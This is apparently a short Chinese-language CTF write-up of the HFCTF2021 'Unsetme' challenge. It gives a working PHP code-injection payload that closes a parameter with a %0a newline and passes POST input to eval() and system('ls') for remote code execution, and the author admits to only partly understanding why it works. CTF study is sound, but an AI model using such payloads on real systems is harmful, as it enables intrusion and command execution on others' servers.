# [HFCTF2021Quals]Unsetme

进去是这样的:

image-20241105155247891

感觉应该是要给源码的,但是没给,那就只能 wp 大法了,

image-20241105155340638

可以看见这个 $val 就是我们传的 a 参数,这个有点类似于 SQL 注入的感觉,也有点像 ping 的感觉(中间可以加东西,两端得闭合一下)

左边是(我可以是用 a%0a)(%0a 是截止符,没它中间的东西不会执行(不太理解),右边是);我可以直接 phpinfo(执行闭合)

基本上就是

?a=1%0a);eval($_POST[1]);phpinfo(
POST1=system("ls");

image-20241105155948660

参考链接:https://blog.csdn.net/Little_jcak/article/details/123516439

Edited on

Give me a cup of [coffee]~( ̄▽ ̄)~*

odiws WeChat Pay

WeChat Pay

odiws Alipay

Alipay

odiws PayPal

PayPal